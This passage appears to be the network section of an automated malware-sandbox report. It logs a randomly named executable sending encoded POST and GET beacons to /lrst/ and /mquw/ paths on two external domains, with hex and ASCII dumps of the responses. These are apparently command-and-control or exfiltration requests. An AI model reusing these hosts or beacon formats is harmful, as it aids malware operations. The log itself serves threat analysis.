                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sailnway.net/lrst/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 52 75 6b 69 33 74 64 73 37 58 65 4f 73 54 68 56 62 32 63 63 74 6c 62 55 46 31 56 42 66 66 4e 56 43 46 56 6d 50 70 79 65 35 33 42 4d 4b 66 33 4b 45 47 47 35 74 76 72 6b 6f 76 70 44 74 49 35 6e 6c 78 4b 51 70 4e 53 37 52 47 4c 77 4e 67 75 5a 50 38 39 6a 35 31 52 73 6a 65 72 66 51 51 49 42 33 67 56 63 66 44 62 31 33 63 4d 53 77 50 51 56 54 55 30 76 36 4a 35 2b 4a 31 78 69 5a 6f 39 65 4a 4e 64 50 2b 74 45 4c 51 69 44 4d 69 4d 48 71 31 43 50 57 6f 6e 41 2b 4f 56 53 63 54 39 76 6d 6c 67 48 6f 31 4b 46 37 32 70 2f 4a 6c 6d 65 31 4c 39 46 4c 4f 62 4b 69 49 62 6b 3d
                                                        Data Ascii: x0wHoJ8X=rBDGnmFpclO/Ruki3tds7XeOsThVb2cctlbUF1VBffNVCFVmPpye53BMKf3KEGG5tvrkovpDtI5nlxKQpNS7RGLwNguZP89j51RsjerfQQIB3gVcfDb13cMSwPQVTU0v6J5+J1xiZo9eJNdP+tELQiDMiMHq1CPWonA+OVScT9vmlgHo1KF72p/Jlme1L9FLObKiIbk=


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        38 | 192.168.2.5 | 53656 | 85.159.66.93 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:42.499346972 CEST | 836 | OUT | POST /lrst/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.sailnway.net
                                                        Origin: http://www.sailnway.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sailnway.net/lrst/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 35 56 43 6e 4e 6d 4f 6f 79 65 30 58 42 4d 41 2f 33 31 61 32 47 69 74 76 75 62 6f 75 56 44 74 49 39 6e 6c 78 61 51 6f 36 2b 30 51 57 4c 79 4c 67 75 66 4c 38 39 6a 35 31 52 73 6a 65 75 58 51 51 77 42 33 52 46 63 65 68 7a 71 35 38 4d 64 67 66 51 56 58 55 30 72 36 4a 35 51 4a 77 56 49 5a 72 46 65 4a 4d 74 50 2f 38 45 4d 48 53 44 4b 6d 4d 47 70 6b 42 32 68 6d 47 6f 51 4e 58 61 62 4c 4e 7a 74 74 32 71 43 76 6f 4e 54 6c 4a 54 78 31 31 57 43 61 4e 6b 69 55 34 61 53 57 4d 7a 36 66 62 59 39 55 48 62 65 44 4c 49 37 41 70 4b 78 32 72 55 30
                                                        Data Ascii: x0wHoJ8X=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5Ret5VCnNmOoye0XBMA/31a2GitvubouVDtI9nlxaQo6+0QWLyLgufL89j51RsjeuXQQwB3RFcehzq58MdgfQVXU0r6J5QJwVIZrFeJMtP/8EMHSDKmMGpkB2hmGoQNXabLNztt2qCvoNTlJTx11WCaNkiU4aSWMz6fbY9UHbeDLI7ApKx2rU0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        39 | 192.168.2.5 | 53657 | 85.159.66.93 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:45.041285038 CEST | 1853 | OUT | POST /lrst/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.sailnway.net
                                                        Origin: http://www.sailnway.net
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.sailnway.net/lrst/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 42 56 43 30 46 6d 4f 4c 61 65 31 58 42 4d 65 76 33 30 61 32 47 76 74 72 44 53 6f 75 5a 54 74 4e 68 6e 6e 53 43 51 76 49 47 30 65 6d 4c 79 47 41 75 65 50 38 39 71 35 31 42 67 6a 65 65 58 51 51 77 42 33 53 74 63 62 44 62 71 70 4d 4d 53 77 50 51 5a 54 55 31 4f 36 4a 78 6d 4a 78 56 79 65 62 6c 65 51 73 39 50 79 75 38 4d 46 79 44 49 71 73 47 4c 6b 41 4b 2b 6d 47 6b 32 4e 57 66 4f 4c 50 7a 74 75 67 57 56 38 4c 68 38 35 6f 44 32 6c 32 57 66 4c 6f 4d 73 65 75 61 38 4b 65 37 6e 62 59 6f 43 44 6a 37 68 46 5a 39 6f 43 64 75 4c 6e 2f 70 7a 39 36 55 73 6c 30 37 52 30 6b 74 59 69 6a 74 51 6e 69 66 43 4a 39 32 64 4d 4f 78 74 4d 48 58 6a 76 47 33 42 6e 75 67 72 78 30 31 2b 63 49 31 6e 42 47 71 6f 36 6e 35 42 53 69 53 6f 50 48 56 70 39 6f 58 43 47 49 58 67 6b 4b 4b 38 76 4b 65 30 77 4c 2f 65 30 37 39 38 74 62 57 51 6e 63 55 49 46 44 4c 6f 51 45 53 74 74 51 36 4e 58 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X= [TRUNCATED]


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        40 | 192.168.2.5 | 53658 | 85.159.66.93 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:47.583436012 CEST | 561 | OUT | GET /lrst/?x0wHoJ8X=mDrmkSN/AS2kB6l18epq8nmRkgENFEghmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KQHyUFQSAc8UP525zlOX/aW9T9BNmWB7W/bov9uBpemVAjQ==&2VDlJ=Z2VdhTx HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.sailnway.net
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Sep 18, 2024 16:20:48.478960991 CEST | 225 | IN | HTTP/1.1 404 Not Found
                                                        Server: nginx/1.14.1
                                                        Date: Wed, 18 Sep 2024 14:20:48 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        X-Rate-Limit-Limit: 5s
                                                        X-Rate-Limit-Remaining: 19
                                                        X-Rate-Limit-Reset: 2024-09-18T14:20:53.2672313Z


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        41 | 192.168.2.5 | 53659 | 188.114.97.3 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:53.578528881 CEST | 813 | OUT | POST /mquw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.chinaen.org
                                                        Origin: http://www.chinaen.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 209
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.chinaen.org/mquw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 77 58 4a 6b 44 51 53 72 66 4f 39 38 45 4d 59 42 54 77 6a 4f 6f 6e 6e 6a 59 71 50 68 56 79 48 4e 46 53 63 73 4a 78 44 7a 57 57 66 41 62 32 72 64 77 6e 7a 66 7a 68 66 56 56 6d 46 45 54 31 6e 58 41 39 42 4d 74 58 32 56 34 39 49 4b 44 51 5a 47 45 33 5a 72 6e 54 75 4e 73 72 4b 4f 70 41 4c 54 64 34 42 58 34 51 56 55 37 34 58 48 61 77 4c 4a 51 45 68 32 76 4e 71 4c 74 4e 69 4f 66 53 31 63 42 68 45 6f 74 6d 63 37 43 69 6c 63 6a 4d 6b 61 78 65 79 4f 68 6f 69 72 73 34 78 48 68 65 69 54 36 61 6c 4b 79 37 75 47 68 30 62 37 42 68 52 30 69 4d 63 4c 65 4c 6b 78 76 72 2f 6f 53 4c 6c 78 6f 50 36 78 75 55 30 3d
                                                        Data Ascii: x0wHoJ8X=wXJkDQSrfO98EMYBTwjOonnjYqPhVyHNFScsJxDzWWfAb2rdwnzfzhfVVmFET1nXA9BMtX2V49IKDQZGE3ZrnTuNsrKOpALTd4BX4QVU74XHawLJQEh2vNqLtNiOfS1cBhEotmc7CilcjMkaxeyOhoirs4xHheiT6alKy7uGh0b7BhR0iMcLeLkxvr/oSLlxoP6xuU0=
                                                        Sep 18, 2024 16:20:54.781192064 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:20:54 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Product: Z-BlogPHP 1.7.3
                                                        X-XSS-Protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYi0fVvSiCoyH6lo5%2FmmUEXnl2Wn%2B2ThhMoUXgcvOf0xfOY%2F0rwo6Fl7XiDBgeTJ1mClj3WFcn8Iu%2BY6q6IE%2FwsRVXIkLfnbc8rMO7LaDOlA2KOVCB8Tb24DP%2Fikxsk4QhA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c51fab57d3b7ce8-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 61 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 [TRUNCATED]
                                                        Data Ascii: a52YySGW;tfSTp")R;ZCfZR30qJ1G|`l;9?3[=#kJho"o)D])"'jB i!4|_PCQDLd@&:E:(~]FOLTWUTHIf9eE{AP**(e$TXY#q<:bjBSQ_Bk4kXZZZ2TQ4uL1TmO(TEP[-=-v6gWvn/ pl;xf$""X?R&JDM$uvvr"1LK)!K[N$L$vH-KJa'DlY0<"+?FdV<EqntbjP".Q&[zK6Ae[]EKglb<gIXtT]U4R!w,q"
                                                        Sep 18, 2024 16:20:54.781241894 CEST | 1236 | IN | Data Raw: 29 e3 85 34 49 5e ca 89 c4 89 d2 15 3b 7e ec f8 b1 88 82 33 40 56 a1 65 45 05 4a 0c 1e 57 0d d5 7d 7c 3d 43 ac 23 53 88 45 2c 03 ea 5c 98 f7 c0 b1 88 c4 ff 15 9c f1 e4 f2 67 35 23 d7 c3 b9 0e 92 07 7c 82 38 b9 e0 d1 d4 10 a9 24 49 fc de 86 08 ac
                                                        Data Ascii: )4I^;~3@VeEJW}|=C#SE,\g5#|8$IEB,a4$$T4JAEyIOXa&%oCf@Jm'g)Vx?Pg`AL.+<Z]G$*<UAR$fW0|,R-6eC<v'%$
                                                        Sep 18, 2024 16:20:54.781275034 CEST | 870 | IN | Data Raw: f1 81 3d f5 ab bb f9 ab bb f6 c0 1e d8 2e 6e 8d f3 a1 91 21 67 7d c1 dd 9e 64 53 6b bc 39 3c ca b6 7e 2c e4 73 f6 74 d6 59 ef 77 d6 af db 4b 37 dc d5 49 be ce 5e a7 f8 37 02 df 13 87 44 db 60 8e 0d 2f 3b c3 0b 6c 61 c4 be d9 6b f7 0c fb 29 78 67
                                                        Data Ascii: =.n!g}dSk9<~,stYwK7I^7D`/;lak)xg=TzYxioKk<{$dZ"TQ{=dB$&K'lg~+si5ZJ]p~{dd+`;/"sB2q2EAKc/RD1pt").PU+
                                                        Sep 18, 2024 16:20:54.781727076 CEST | 22 | IN | Data Raw: 63 0d 0a e3 e5 02 00 6f 66 ff 91 97 1e 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: cof0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        42 | 192.168.2.5 | 53660 | 188.114.97.3 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:56.120330095 CEST | 833 | OUT | POST /mquw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.chinaen.org
                                                        Origin: http://www.chinaen.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 229
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.chinaen.org/mquw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 77 58 4a 6b 44 51 53 72 66 4f 39 38 45 76 77 42 65 7a 37 4f 76 48 6e 67 54 4b 50 68 4d 43 48 4a 46 53 41 73 4a 7a 75 2b 57 6b 37 41 61 58 62 64 78 6d 7a 66 6d 68 66 56 64 47 46 42 65 56 6e 49 41 39 46 75 74 53 57 56 34 39 63 4b 44 52 46 47 46 45 78 30 6f 6a 75 50 71 72 4b 49 78 67 4c 54 64 34 42 58 34 52 6b 42 37 34 2f 48 61 42 37 4a 51 6c 68 31 6a 74 71 49 6f 4e 69 4f 4a 69 31 59 42 68 45 42 74 6e 41 42 43 67 64 63 6a 4e 55 61 78 71 47 50 30 34 69 68 69 59 77 37 69 50 4c 2b 69 63 51 46 39 64 62 73 34 69 44 79 4e 33 38 65 34 75 55 6a 4e 72 49 4a 2f 34 33 66 44 37 45 59 79 73 71 42 77 44 67 6a 48 65 6b 4d 4b 53 5a 6c 70 41 33 6a 4c 66 4c 51 57 6e 6f 67
                                                        Data Ascii: x0wHoJ8X=wXJkDQSrfO98EvwBez7OvHngTKPhMCHJFSAsJzu+Wk7AaXbdxmzfmhfVdGFBeVnIA9FutSWV49cKDRFGFEx0ojuPqrKIxgLTd4BX4RkB74/HaB7JQlh1jtqIoNiOJi1YBhEBtnABCgdcjNUaxqGP04ihiYw7iPL+icQF9dbs4iDyN38e4uUjNrIJ/43fD7EYysqBwDgjHekMKSZlpA3jLfLQWnog
                                                        Sep 18, 2024 16:20:57.207595110 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:20:57 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Product: Z-BlogPHP 1.7.3
                                                        X-XSS-Protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S4nQ9G1BVj%2FENK2m%2FRzcsPmQlAa%2F4wGZjK002PQG1nsH%2B8moXxoChhuMBSTWorppXAy55EdEpZoMtlEeEfBiX7EBP2%2B1g2eXQQzG0QpbK0USQsZrHem5JqRptTxLTNTQQ1U%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c51fac53eb9435d-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 61 35 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 [TRUNCATED]
                                                        Data Ascii: a5eYySGW;tfSTp")R;ZCfZR30qJ1G|`l;9?3[=#kJho"o)D])"'jB i!4|_PCQDLd@&:E:(~]FOLTWUTHIf9eE{AP**(e$TXY#q<:bjBSQ_Bk4kXZZZ2TQ4uL1TmO(TEP[-=-v6gWvn/ pl;xf$""X?R&JDM$uvvr"1LK)!K[N$L$vH-KJa'DlY0<"+?FdV<EqntbjP".Q&[zK6Ae[]EKglb<gIXtT]U4R!w,q")
                                                        Sep 18, 2024 16:20:57.207663059 CEST | 224 | IN | Data Raw: 85 34 49 5e ca 89 c4 89 d2 15 3b 7e ec f8 b1 88 82 33 40 56 a1 65 45 05 4a 0c 1e 57 0d d5 7d 7c 3d 43 ac 23 53 88 45 2c 03 ea 5c 98 f7 c0 b1 88 c4 ff 15 9c f1 e4 f2 67 35 23 d7 c3 b9 0e 92 07 7c 82 38 b9 e0 d1 d4 10 a9 24 49 fc de 86 08 ac 1f 45
                                                        Data Ascii: 4I^;~3@VeEJW}|=C#SE,\g5#|8$IEB,a4$$T4JAEyIOXa&%oCf@Jm'g)Vx?Pg`AL.+<Z]G$*<UAR$fW0|,R-6eC
                                                        Sep 18, 2024 16:20:57.207693100 CEST | 1236 | IN | Data Raw: 3c 80 76 27 1d eb bb b3 ee 25 17 9d 24 88 aa 92 ce c3 53 49 69 6d 78 42 4a 8b 01 9a 49 be 9b 76 c4 55 a8 9f 13 62 ce f8 7a 71 bc 8f 1b 55 b6 a0 56 bf 85 a0 29 a7 ca 06 24 88 a9 95 36 b7 d2 00 d0 10 4d 11 25 2a 24 79 aa 83 32 c5 44 3f d0 22 9f 87
                                                        Data Ascii: <v'%$SIimxBJIvUbzqUV)$6M%*$y2D?"iFvCFVV(ETQgO6={dJiJ^`*73PM`L9+2)$ H`$KK:3'P,]{+J\V3 flMINXU)mOr34i)3
                                                        Sep 18, 2024 16:20:57.207971096 CEST | 661 | IN | Data Raw: 92 74 22 13 29 e0 93 2e 50 83 93 55 02 ca 2b bd ca ba 28 13 6d f7 b6 f6 ef e0 27 2a 49 9e fc e3 49 10 16 df 13 5b c1 27 69 ac 2a 20 fc 5e 6b cb 07 27 f6 47 73 a9 f4 44 0c c4 eb 94 3a 31 51 22 81 4c fe ee 25 56 11 c4 11 07 a7 78 41 f1 40 4b f8 52
                                                        Data Ascii: t").PU+(m'*II['i* ^k'GsD:1Q"L%VxA@KR"so7/UT IreATQ0mTWB^|PmTe&Fx|hN[hG;^oTNDA1GMb& zj%hI)WC"9T$OC5}]


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        43 | 192.168.2.5 | 53661 | 188.114.97.3 | 80 | 1788 | C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Sep 18, 2024 16:20:58.697415113 CEST | 1850 | OUT | POST /mquw/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.chinaen.org
                                                        Origin: http://www.chinaen.org
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.chinaen.org/mquw/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                        Data Raw: 78 30 77 48 6f 4a 38 58 3d 77 58 4a 6b 44 51 53 72 66 4f 39 38 45 76 77 42 65 7a 37 4f 76 48 6e 67 54 4b 50 68 4d 43 48 4a 46 53 41 73 4a 7a 75 2b 57 6b 7a 41 61 6c 54 64 78 42 6e 66 30 52 66 56 58 6d 46 41 65 56 6e 46 41 35 70 71 74 53 61 76 34 2f 6b 4b 52 44 68 47 43 31 78 30 2f 7a 75 50 6f 72 4b 4e 70 41 4c 38 64 34 52 62 34 51 59 42 37 34 2f 48 61 44 6a 4a 57 30 68 31 68 74 71 4c 74 4e 69 53 66 53 31 77 42 6c 67 37 74 6d 31 32 43 51 39 63 69 74 45 61 69 76 79 50 70 49 69 6e 76 34 77 6a 69 50 58 39 69 63 6c 36 39 5a 61 44 34 6c 76 79 50 57 35 4a 68 74 63 6c 66 64 4d 64 76 70 72 6f 65 74 55 6f 73 36 75 4a 38 77 78 42 4d 74 46 6a 47 33 6c 71 38 44 53 71 53 4f 7a 2b 66 7a 4a 71 59 4a 31 4d 2f 47 44 6b 6d 64 43 32 72 59 62 70 4e 74 75 4d 37 6d 68 2b 31 56 4a 68 73 47 49 68 52 4a 51 53 65 6c 4d 33 54 78 2b 63 2f 45 6c 4c 4e 76 4c 42 49 32 4d 53 6e 59 32 61 61 74 48 44 64 36 70 51 56 70 74 55 68 4f 36 33 7a 47 5a 2b 46 33 2b 6a 6b 61 41 6f 45 34 70 58 54 33 55 47 53 2b 61 49 6b 32 39 52 59 53 54 63 61 [TRUNCATED]
                                                        Data Ascii: x0wHoJ8X= [TRUNCATED]
                                                        Sep 18, 2024 16:20:59.707585096 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                        Date: Wed, 18 Sep 2024 14:20:59 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Product: Z-BlogPHP 1.7.3
                                                        X-XSS-Protection: 1; mode=block
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=etHMhN214ihAwot1ehHbqV6GKyOUw1THI9%2BG9nPgSIz%2BduB%2FseIQSZLZXJeWFZH3XJ8Q0V7fGyO7RziAKO2sz%2FdPpOnnrtKwh9cimGs9dQqrhOXmuRNGgR9vgp07mwwHgZE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c51fad5597119b6-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        Data Raw: 61 35 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 59 79 53 1b 47 16 ff 1b 57 f9 3b 74 66 53 11 54 a1 19 09 70 0e 22 29 95 a4 52 d9 3b de c4 d9 da 5a af 43 b5 66 5a 52 db 33 d3 e3 99 96 30 71 a5 4a c4 80 91 31 47 7c 10 ce 60 6c 13 1c 3b 1c b6 c1 91 39 3f 8c d5 33 a3 bf f8 0a 5b 3d 23 09 09 8c b0 89 bd 6b 4a 68 d4 dd ef fc f5 eb d7 dd 6f 22 6f 29 44 a6 5d 06 02 29 aa a9 b1 e3 c7 22 95 27 82 0a 7f 6a 88 42 20 a7 a0 69 21 1a 15 d2 34 11 7c 5f a8 f4 eb 50 43 51 c1 44 ba 82 4c 64 0a 40 26 3a 45 3a 8d 0a 9d 28 7e 0e d3 5d c2 14 a5 46 10 9d 4f e3 4c 54 f8 57 f0 eb 8f 83 9f 12 cd 80 14 c7 55 54 c5 f5 a7 cf a2 48 49 a2 66 39 65 12 0d 45 c3 7b 15 41 c3 50 b1 0c e3 2a 0a 2a 28 83 65 24 54 58 0d b9 59 23 71 ac a2 bd 3c 19 8c 3a 0d 62 d2 6a e3 b0 42 53 51 5f 42 d0 6b 34 6b 58 c7 5a 5a 0b 5a 32 54 51 34 dc 8c 75 4c 31 54 cb 6d 4f 28 c5 54 45 b1 b6 50 db 5b 80 2d 3d 2d e4 07 dd d5 df 76 36 ae 16 67 57 8b d3 b7 ed a9 fb 76 6e 8b f5 2f 83 20 70 86 06 dc 6c af 3b 78 c7 cd 66 ed 1b eb ce cd b9 c2 d3 01 b6 f8 24 22 f9 22 